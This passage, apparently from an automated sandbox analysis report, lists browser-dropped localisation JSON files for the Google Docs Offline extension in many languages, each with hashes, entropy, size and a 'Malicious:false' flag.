                                                                                                                                              SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                              MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3122
                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                              MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                              SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                              SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                              SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1895
                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                              MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                              SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                              SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                              SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1042
                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                              MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                              SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                              SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                              SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2535
                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                              MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                              SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                              SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                              SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1028
                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                              MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                              SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                              SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                              SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):994
                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                              MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                              SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                              SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                              SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2091
                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                              MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                              SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                              SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                              SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2778
                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                              MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                              SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                              SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                              SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1719
                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                              MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):936
                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                              MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3830
                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                              MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1898
                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):914
                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                              MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):851
                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):878
                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                              MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2766
                                                                                                                                              Entropy (8bit):3.839730779948262
